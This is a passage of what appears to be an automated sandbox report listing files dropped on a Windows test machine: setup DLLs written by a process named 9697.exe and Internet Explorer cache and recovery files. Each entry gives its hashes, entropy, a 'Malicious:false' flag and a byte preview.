                                                                                                                                                                                                              SHA-512:CBDF1828E892035F05554298480F0416AADBD83C5020EE02AB7FB13BD7B03418297632C7AADC4C82EF850C5E79B03F9044C86A3D5BE09DCB07C1834B90DB2F23
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X..s... ... ... ...!... ...!... ... R.. ...!3.. ...!... ...!... ...!y.. ..% ... ...!... Rich... ........................PE..L...4jpZ...........!.....B...l.......;.......`......................................R ....@A........................0I..........|.......H................!.......2.....T....................*......p)..@............................................text...>A.......B.................. ..`.data........`.......F..............@....idata..t............X..............@..@.rsrc...H............r..............@..@.reloc...2.......4...x..............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              C:\$Windows.~WS\Sources\wdscore.dll
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\9697.exe
                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):201528
                                                                                                                                                                                                              Entropy (8bit):6.405403159422954
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6144:yZ3oXN1cvpP/YeJvuBLqAOAWgERCGwDlyxfb2g/4S/IAiN85McisT:KXvSLqAOAWgERCNI6g/4giN8KXsT
                                                                                                                                                                                                              MD5:07F3FAC5518C90B22DFB9778EA280D0A
                                                                                                                                                                                                              SHA1:6D20FF953A0C5AABC1970E80A5F96AEDD830DB9B
                                                                                                                                                                                                              SHA-256:65467BF1FBF10C2A399FE532B780F3604FDA5B00DB8319787CB6867BEDE4B90E
                                                                                                                                                                                                              SHA-512:F86447C3DD0AD11022B208BA04C7B62CDDF57B1035F4B1E18AAE3E6764B6DCE53FBEAA68CB5CE3AB75BA08293474DC18E9A3F5CE6DF43A01701ABD9180E07ACE
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......nG4.*&Z.*&Z.*&Z.#^..(&Z.>MY..&Z.>M^.$&Z.*&[..&Z.>M[.'&Z.>M_.#&Z.>MZ.+&Z.>MR.5&Z.>M..+&Z.>MX.+&Z.Rich*&Z.................PE..L....Q.t...........-.........N......@........................................@............@A............................>...$...d.......................8!.......".. ...T...............................@............... ............................text...>........................... ..`.data...h...........................@....idata..............................@..@.rsrc...............................@..@.reloc...".......$..................@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              C:\$Windows.~WS\Sources\wdscsl.dll
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\9697.exe
                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):50504
                                                                                                                                                                                                              Entropy (8bit):6.56063223965799
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:bvftzpTPMNBV4VJMZ/MZJ//3swsxsiM9gVP599:7ftNTENBVcMZW/3sjaiM9gVj9
                                                                                                                                                                                                              MD5:0B778AD42D5E17CE89936F6D4C42957D
                                                                                                                                                                                                              SHA1:DCC971675653547295AC4EE95E139A1CCA7A20C5
                                                                                                                                                                                                              SHA-256:D5BCFDAB29EA1DEEA22679A4A4473A9CC84871A5D707C006EB99FACB4AF9081B
                                                                                                                                                                                                              SHA-512:3AAF945A4735BC867AD4C4213EC43079B8B8FEF17CBAF3B394365762451E36F51075E7E129FC8DCBC847DC44501536309114B6C54A4D415D21D0459049E51026
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+.~\o...o...o...{...l...{...a...o.......{...p...{...i...{...n...{...w...{...n...{...n...Richo...........................PE..L....7............!........."......@.....................................................@A............................S..............0...............H!......P...P!..T...................D...........@............................................text...C........................... ..`.data...............................@....idata..............................@..@.rsrc...0...........................@..@.reloc..P...........................@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              C:\$Windows.~WS\Sources\wdsimage.dll
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\9697.exe
                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):750032
                                                                                                                                                                                                              Entropy (8bit):6.620521533851412
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12288:YuUi9cOIJAeMgC14k1BzD96/am+Bzqx8J8yh7Rb6bbYYcdacXgmr0zZkIvSzfqav:Ai9cOsMgC144vOe7RbibYZMcSsldT
                                                                                                                                                                                                              MD5:B5D99819CB865C4DA4EBE8880F5ADA7E
                                                                                                                                                                                                              SHA1:5BAD51BECB913F65ACC8B2DF912AC76A24F0834D
                                                                                                                                                                                                              SHA-256:4ED57014301E91B0504E0C2A62F4EE969CCF4C179DE9788D1307DBC71186D543
                                                                                                                                                                                                              SHA-512:5AC313784CB4AA3829AE59770049B27D3D50193B206CAD43C2D79BB7674766BE5199F4F76BE9854DF635DF2094E763CA61F14699D8538F62393F10C781FCCFB7
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........4...g...g...g...f...g...f...g...g4..g...f...g...f...g...f...g...f...g...g...g...f...gRich...g................PE..L...."n~...........!................Px..............................................yK....@A................................\...@....................P...!... ...m..0...T....................7.......7..@...............X............................text.............................. ..`.data...............................@....idata...$.......&..................@..@.rsrc...............................@..@.reloc...m... ...n..................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              C:\$Windows.~WS\Sources\wdstptc.dll
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\9697.exe
                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):516032
                                                                                                                                                                                                              Entropy (8bit):6.669254995489913
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12288:6ZTPK4dHSyYHxUpt3NIqct9awKFaLXDXjjf2Uxg8NcTki1NgLOi7TW/P2PxxQ:6FlJSbkt3yLXDXjjfF+L2nQ
                                                                                                                                                                                                              MD5:7A020A931614E1A7CA1DB482D1C00EDE
                                                                                                                                                                                                              SHA1:782FADD14783D0A10520294E4E69036ADB556E53
                                                                                                                                                                                                              SHA-256:48EE94546C9345FBE5AD1A51F4826B131DA554A8E4395E5D22E4CDE09B3816D5
                                                                                                                                                                                                              SHA-512:7DE656C091C95D91C6A78115BEB497AFD11FBCCB1B47D3F7557D0AB1D3E52EB2A2060E640222D445D6859A7C1813901653CC77BBA0D21E1DCB46AAA413A17430
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........+..E..E..E...F..E...A..E..D.u.E...D..E...@..E...E..E...L.#.E....E...G..E.Rich.E.................PE..L....Ey7...........!.....N...x.......=.......`.......................................L....@A........................PZ..S....t..,.......(................!......<?..`...T...................|...........@............p...............................text....M.......N.................. ..`.data...D....`.......R..............@....idata..` ...p..."...V..............@..@.rsrc...(............x..............@..@.reloc..<?.......@...~..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              C:\$Windows.~WS\Sources\wdsutil.dll
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\9697.exe
                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):237384
                                                                                                                                                                                                              Entropy (8bit):6.580668822713633
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6144:al6Ls7+dMPL25tZ1qeLkLY85pwkfLWdm7bS:Y2s7+dMPL8tZ/4s8PwkC/
                                                                                                                                                                                                              MD5:818E76521DAD2369E8F713AECDA42145
                                                                                                                                                                                                              SHA1:DF047D531B34433F5139BEAA886AF72136FD1537
                                                                                                                                                                                                              SHA-256:EAB16299B69323FCA094F2D214A5BC5FBF973040B7CCD187415EDF985F46B21D
                                                                                                                                                                                                              SHA-512:2414E9DB470251251796DE54000DC4067697068F7FD38C6BF443B367C9EC8E05CB1D75455D6DBD8BD08419FE13CC99DECCB44086CD32BD72EA76F743EF239D4B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<..|x.a/x.a/x.a/l.b.z.a/l.e.w.a/x.`/a.a/l.`.k.a/l.d.p.a/l.a.y.a/l.h.P.a/l../y.a/l.c.y.a/Richx.a/................PE..L...;.e............-.....$...\...............@......................................r.....@A........................P...C>..`c.......................~..H!.......&..pO..T...............................@............`..\...(...@....................text....".......$.................. ..`.data...\....@.......(..............@....idata..z....`.......8..............@..@.didat.. ............P..............@....rsrc................R..............@..@.reloc...&.......(...V..............@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              C:\$Windows.~WS\Sources\wpx.dll
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\9697.exe
                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1082696
                                                                                                                                                                                                              Entropy (8bit):6.364208954994143
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12288:bO3QPsPj6z55ORVLWvluEJm+po+UyFwhDfRRBp4YZgeXc:b7PsPj6z55ORVLWvwao+UWwBRRBQeXc
                                                                                                                                                                                                              MD5:15E92D3769E6EEFA80DAAC3085741BF6
                                                                                                                                                                                                              SHA1:E149B74683E37D6FF574788D233020E5DD097795
                                                                                                                                                                                                              SHA-256:08C8A6B2F76F9D9152E01FF3118990FDCDBB0D2E8C57DBFE43568367493187D4
                                                                                                                                                                                                              SHA-512:CE8EB54356739EB9E40C3F62026CA7371CB8E24A0CFB83897535D85B401829DCCAD56A027B76E824CF482C4D128FE1014C6B9416C44D16FA179A2FC2B6F5BBB9
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........C...-...-...-.......-......-..)...-...,...-..,...-..(...-..-...-..$..-......-../...-.Rich..-.........PE..L....._Z...........!.........|......................................................j.....@A................................tR.......p...@...........d..H!.............T...................$<......x;..@............P..p............................text............................... ..`PAGE................................ ..`.data....J.......F..................@....idata.......P.......4..............@..@.rsrc....@...p...B...F..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1828
                                                                                                                                                                                                              Entropy (8bit):7.367371959019618
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:+JnJ17tcudRMq6QsgJnJ17tcudRMq6QsF:+FniudV/FniudVS
                                                                                                                                                                                                              MD5:3199B61559DF1A42A84B0C8F73911A53
                                                                                                                                                                                                              SHA1:CAAAEED136A2621F9A8C00AC20903D6F55DA5187
                                                                                                                                                                                                              SHA-256:BC619DAD2C9140A6E9B8E43C1EC99BC59B467A83E263B3D8AE3DE96B72D4A38B
                                                                                                                                                                                                              SHA-512:0F0FBEC2AE152B871FFA30431F64E1C7287F236CF5CC191C47BCCD5CE89B101C8EA6DB84746A499FBD209781EA6DD7A55063DF70347A4682EF30812ADE5615B0
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: 0...0..v........:......(d.....0...*.H........0a1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1 0...U....DigiCert Global Root G20...130801120000Z..380115120000Z0a1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1 0...U....DigiCert Global Root G20.."0...*.H.............0.........7.4.{k.h..Ju.F.!.....T......:..<z...k.-.^.$D.b.~..~.Tu ..P..c.l0.............7...CN.{,.../..:...%.k.`.`.O!I..g..a......2k..W.].......I.5-..Im.w..IK..U......#.LmE.....0..LU.'JW.|...s...J...P.......!..........g(.s..=Fv...!4M..E..I.....3.).......B0@0...U.......0....0...U...........0...U......N"T ....n..........90...*.H.............`g(.o.Hc.1..g..}<.J...+.._sw*2.9.gB.#.Eg5....a.4.. L....5.v..B..D...6t$Z.l..Y5..I....G*=./.\... ._SF..h...0.>1.....>5.._..pPpGA.W.N......./.%.u...o..Aq..*.O. U...E..D..2...SF.,...".K..E....X..}R..YC....&.o....7}.....w_v.<..]V[..fn.57.2.0...0..v........:......(d.....0...*.H........0a1.0...U....US1.0...U....DigiCert Inc1.
                                                                                                                                                                                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:Microsoft Cabinet archive data, 59863 bytes, 1 file
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):119726
                                                                                                                                                                                                              Entropy (8bit):7.99556910241083
                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                              SSDEEP:3072:GNOqOrdDdJPAX1LHAeNOqOrdDdJPAX1LHA/:aOrdRyX1LH7OrdRyX1LHC
                                                                                                                                                                                                              MD5:BD3E93AD23BB0CA00C44D8774C63E84F
                                                                                                                                                                                                              SHA1:03FB85A6B46615FAEB2D3E29FBC399593D7B5D15
                                                                                                                                                                                                              SHA-256:3526E251E631B67BC547442F85BFE5DD97A109CBC0189F04E1BD40D988EE18B5
                                                                                                                                                                                                              SHA-512:49571828C169BDC5D526D1A48A84002F075F846091DCB26032951EDB1D0A01FCCB0A66646E153B976F048F540009B6A368AFD830531A3F8E2F9CC7E5AFCE6ACD
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: MSCF............,...................I........b.........R.i .authroot.stl.qqp.4..CK..8T....c_.d....A.F....m"...AH)-.%.QIR..$t)Kd.-QQ*..~.L.2.L........sx.}...~....$....yy.A.8;....|.%OV.a0xN....9..C..t.z.,X...,..1Qj,.p.E.y..ac`.<.e.c.aZW..B.jy....^]..+)..!...r.X:.O.. ..Y..j.^.8C........n7R....p!|_.+..<...A.Wt.=. .sV..`.9O...CD./.s.\#.t#..s..Jeiu..B$.....8..(g..tJ....=,...r.d.].xqX4.......g.lF...Mn.y".W.R....K\..P.n._..7...........@pm.. Q....(#.....=.)...1..kC.`......AP8.A..<....7S.L....S...^.R.).hqS...DK.6.j....u_.0.(4g.....!,.L`......h:.a]?......J9.\..Ww........%........4E.......q.QA.0.M<.&.^*aD.....,..]*....5.....\../ d.F>.V........_.J....."....wI..'..z...j..Ds....Z...[..........N<.d.?<....b..,...n......;....YK.X..0..Z.....?...9.3.+9T.%.l...5.YK.E.V...aD.0...Y../e.7...c..g....A..=.....+..u2..X.~....O....\=...&...U.e...?...z....$.)S..T...r.!?M..;.....r,QH.B <.(t..8s3..u[.N8gL.%...v....f...W.y...cz-.EQ.....c...o..n........D*..........2.
                                                                                                                                                                                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):504
                                                                                                                                                                                                              Entropy (8bit):3.087272188716575
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:5U5LutWOxSW0zeYrsMlU6LutWOxSW0zeYrsMlU/:5omWOxL0Pr/ZmWOxL0Pr/C
                                                                                                                                                                                                              MD5:C4C3EDBFFBA649D06EC17FBC8A65DB36
                                                                                                                                                                                                              SHA1:4374864BBCF3AC59084124C0C615988206151EDB
                                                                                                                                                                                                              SHA-256:C9C12F1B1837EE0EEA25F7C0D46CE904949806BBD0D94B9153DAA86E741D39B0
                                                                                                                                                                                                              SHA-512:05316D8F04E98AFA866FBCA26150F3FAFFDE0893E1D48688F862BA2340D1A21727B14CC554AAFA3E43290BF80E3F023F398F6E42607D62C23183C7B83474DA43
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: p...... ....j......l|G..(....................................................... ............n...u..................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.G.l.o.b.a.l.R.o.o.t.G.2...c.r.t...".5.a.2.8.6.4.1.7.-.3.9.2."...p...... ....j...Q..l|G..(....................................................... ............n...u..................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.G.l.o.b.a.l.R.o.o.t.G.2...c.r.t...".5.a.2.8.6.4.1.7.-.3.9.2."...
                                                                                                                                                                                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):652
                                                                                                                                                                                                              Entropy (8bit):3.1291374802912895
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:HsphZkPlE99SNxAhUeSKFTsphZkPlE99SNxAhUeSKO:khZkPcUQUjKFYhZkPcUQUjKO
                                                                                                                                                                                                              MD5:258421547BD6A95D1AA6BEDD54567C78
                                                                                                                                                                                                              SHA1:0245ED1568206C6B8ECCE109F368C53F8E7DBD03
                                                                                                                                                                                                              SHA-256:D5B52C30021C8559D1B3BA6645DA501BFE64181EDED7A0056D113D6FF5564694
                                                                                                                                                                                                              SHA-512:2E1173FBB983A5CC1F29526F9931D8E395E24A37D8D3631EE48B7A86FCC6026D4ACB394506D7AF918DE30D9B2F73B5187EC9385002C5A847B14EF5780A8F2F72
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: p...... ..........`m|G..(....................................................... ...........Y5......$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".8.0.f.8.8.3.5.9.3.5.d.7.1.:.0."...p...... ........!.hm|G..(....................................................... ...........Y5......$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".8.0.f.8.8.3.5.9.3.5.d.7.1.:.0."...
                                                                                                                                                                                                              C:\Users\user\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
                                                                                                                                                                                                              Process:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 16 x 16, 4-bit colormap, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):237
                                                                                                                                                                                                              Entropy (8bit):6.1480026084285395
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:6v/lhPIF6R/C+u1fXNg1XQ3yslRtNO+cKvAElRApGCp:6v/7b/C1fm1ZslRTvAElR47
                                                                                                                                                                                                              MD5:9FB559A691078558E77D6848202F6541
                                                                                                                                                                                                              SHA1:EA13848D33C2C7F4F4BAA39348AEB1DBFAD3DF31
                                                                                                                                                                                                              SHA-256:6D8A01DC7647BC218D003B58FE04049E24A9359900B7E0CEBAE76EDF85B8B914
                                                                                                                                                                                                              SHA-512:0E08938568CD123BE8A20B87D9A3AAF5CB05249DE7F8286FF99D3FA35FC7AF7A9D9797DD6EFB6D1E722147DCFB74437DE520395234D0009D452FB96A8ECE236B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: .PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d...-PLTE......(..5..X..h...........................J4.I...IIDAT.[c`..&.(.....F....cX.(@.j.+@..K.(..2L....1.{.....c`]L9.&2.l...I..E.......IEND.B`.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\3LSQ93X5\www.xbox[1].xml
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):12301
                                                                                                                                                                                                              Entropy (8bit):5.099654091727662
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:6EzBEzH64o64on2Qc40T8EzH64o64on2Qc40Ts:6EzBEztK8EztKs
                                                                                                                                                                                                              MD5:0E2A2DC18CAAA03FB4552DABE0CC414E
                                                                                                                                                                                                              SHA1:DB3F1A3D6C3A2A5787015536978A70ADBD58E82C
                                                                                                                                                                                                              SHA-256:D5A08267F071C318F965560D511CC98C723E854A60F50714B07FD73646F785B8
                                                                                                                                                                                                              SHA-512:BCAF93D6F3B6814ABEE55864132AEBF901E7A1A719184E8030FC6EFD57DDEFE5EECEDF598BE31EB3C78A0D14B871781B220E3677D548E43EA99A492443B7B82B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: <root></root><root><item name="com.adobe.reactor.dataElementCookiesMigrated" value="true" ltime="642996928" htime="30885757" /></root><root><item name="com.adobe.reactor.dataElementCookiesMigrated" value="true" ltime="642996928" htime="30885757" /></root><root><item name="com.adobe.reactor.dataElementCookiesMigrated" value="true" ltime="642996928" htime="30885757" /></root><root><item name="com.adobe.reactor.dataElementCookiesMigrated" value="true" ltime="642996928" htime="30885757" /></root><root><item name="com.adobe.reactor.dataElementCookiesMigrated" value="true" ltime="642996928" htime="30885757" /><item name="ct.p.s.V1.3289174904963098" value="{&quot;s&quot;:&quot;3289174904963098&quot;,&quot;c&quot;:1620858093702,&quot;e&quot;:1620858513702}" ltime="710036928" htime="30885757" /></root><root><item name="com.adobe.reactor.dataElementCookiesMigrated" value="true" ltime="642996928" htime="30885757" /><item name="ct.p.s.V1.3289174904963098" value="{&quot;s&quot;:&quot;32891749049630
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\MP98E46N\support.microsoft[1].xml
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):11476
                                                                                                                                                                                                              Entropy (8bit):5.164104207930849
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:yE3PbwicI1E3PbwicI89E3PbwicI8yzE3PbwicI8yzBtE3PbwicI8yzBj:yE3TwinE3Twie9E3TwieEE3TwieCBtE7
                                                                                                                                                                                                              MD5:A81114F6E1DAFFD8BE7A8F581388D26F
                                                                                                                                                                                                              SHA1:85E4858599351FD17FA54CADBEC6557D12C82D7B
                                                                                                                                                                                                              SHA-256:25D58A540F5DE6A83C59E10C16115426FC4F2149B2C8432FB3ACEA806DB5DD1E
                                                                                                                                                                                                              SHA-512:E8544BABE05483440A160352FC13AD522871EDA674CC6B1D8245DD93D16DB8742A2B6D5D5E9BC376A0308130CE32622293FF38DC091CD35FC93DC08799A94803
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: <root></root><root></root><root><item name="__storage_test__" value="__storage_test__" ltime="366006928" htime="30885757" /></root><root></root><root><item name="obf-CampaignDefinitions" value="[{&quot;CampaignId&quot;:&quot;f7899ecb-b0e8-45d1-b325-301c2c3c443b&quot;,&quot;StartTimeUtc&quot;:&quot;2018-12-07T00:00:00Z&quot;,&quot;EndTimeUtc&quot;:&quot;9999-12-31T23:59:59Z&quot;,&quot;GovernedChannelType&quot;:0,&quot;Scope&quot;:{&quot;Type&quot;:1},&quot;NominationScheme&quot;:{&quot;Type&quot;:0,&quot;PercentageNumerator&quot;:2,&quot;PercentageDenominator&quot;:100,&quot;NominationPeriod&quot;:{&quot;Type&quot;:0,&quot;IntervalSeconds&quot;:604800},&quot;CooldownPeriod&quot;:{&quot;Type&quot;:0,&quot;IntervalSeconds&quot;:1209600}},&quot;SurveyTemplate&quot;:{&quot;Type&quot;:2,&quot;ActivationEvent&quot;:{&quot;Type&quot;:0,&quot;Activity&quot;:&quot;AppUsageTime&quot;,&quot;Count&quot;:180,&quot;IsAggregate&quot;:true},&quot;Content&quot;:{&quot;Prompt&quot;:{&quot;Title&quot;:&q
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\Q3DXH6Q1\www.microsoft[1].xml
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):134
                                                                                                                                                                                                              Entropy (8bit):4.726394599260483
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:D90aK1ryRtFwsnObemKmlULF0VqHlJR36FsqSfOZLKb:JFK1rUFjgemKm6GVqHlJR36FIuub
                                                                                                                                                                                                              MD5:CBC04E31115E87496E31A807BE7A9018
                                                                                                                                                                                                              SHA1:4845DF2990FCBB1A148ACCE0C291DEFF34947B11
                                                                                                                                                                                                              SHA-256:5512AAFA3B0BEAFAD3C67FABBD91C7CD9367AC114A77FBEDBB877FFD334568F8
                                                                                                                                                                                                              SHA-512:AFB1405276B59F74531C7D349EFE49DF9EB1E4A47898B4729FA40C8EC517FF16A4C600DB9F1AA0C7A258D027473F269A060F35BD6A44ACF88AAE8FC1C103A62E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: <root></root><root><item name="com.adobe.reactor.dataElementCookiesMigrated" value="true" ltime="443096928" htime="30885757" /></root>
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{A55F091A-B36F-11EB-ADCF-ECF4BBB5915B}.dat
                                                                                                                                                                                                              Process:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:Microsoft Word Document
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):47192
                                                                                                                                                                                                              Entropy (8bit):1.9583829553727035
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:MkKbKPpgJGaV0UamLJ6aT0aXoMoaXj50aXn7oaXxJdXt8v0AW:MTGB856DU6agaXqaX6aXkaXDdXt8Mp
                                                                                                                                                                                                              MD5:33858C59571D2A4F6FEC6AC874B36602
                                                                                                                                                                                                              SHA1:73975C28692995E0E56E98D87C72A0236C3A59F2
                                                                                                                                                                                                              SHA-256:BD7E55AA060549EF7936AAE7B58C605056CF7596DC72A34EF9ED743E3773DE59
                                                                                                                                                                                                              SHA-512:40017BF0A05F5C8DF6B7A0DAD8B9DA1030148DF270F990ADA5AC95D1E395FAEA1BA8DC83614A81167EA233499BBEB9803CED2157C5F7950CEC5449F9BF5F1F20
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{47781E22-B370-11EB-ADCF-ECF4BBB5915B}.dat
                                                                                                                                                                                                              Process:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:Microsoft Word Document
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):16984
                                                                                                                                                                                                              Entropy (8bit):1.566471670309632
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:IvwGcpUpGwpNoG4pPMGrapgS3GQpZVG7HpCiTGIpG:M0KDb4JKeSB/E02A
                                                                                                                                                                                                              MD5:301503CA1884BC5DC2D1AC468A99EB67
                                                                                                                                                                                                              SHA1:08F742C60FB1647FC11E69D96D563FB8C88C7B12
                                                                                                                                                                                                              SHA-256:2ABCE9FFC6568D896CB2CC02CDBABAD5BC75D397D975209CCBC4F61373BE2379
                                                                                                                                                                                                              SHA-512:C9B4458383D633ECB6A545E55B5A52CE0D3DDEFA798570CB5B4980FD9AEF35E50FD9E2847CB1971B336632817B3D48B0477513F55FCF41FAC7FBDB8665C58ECF
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
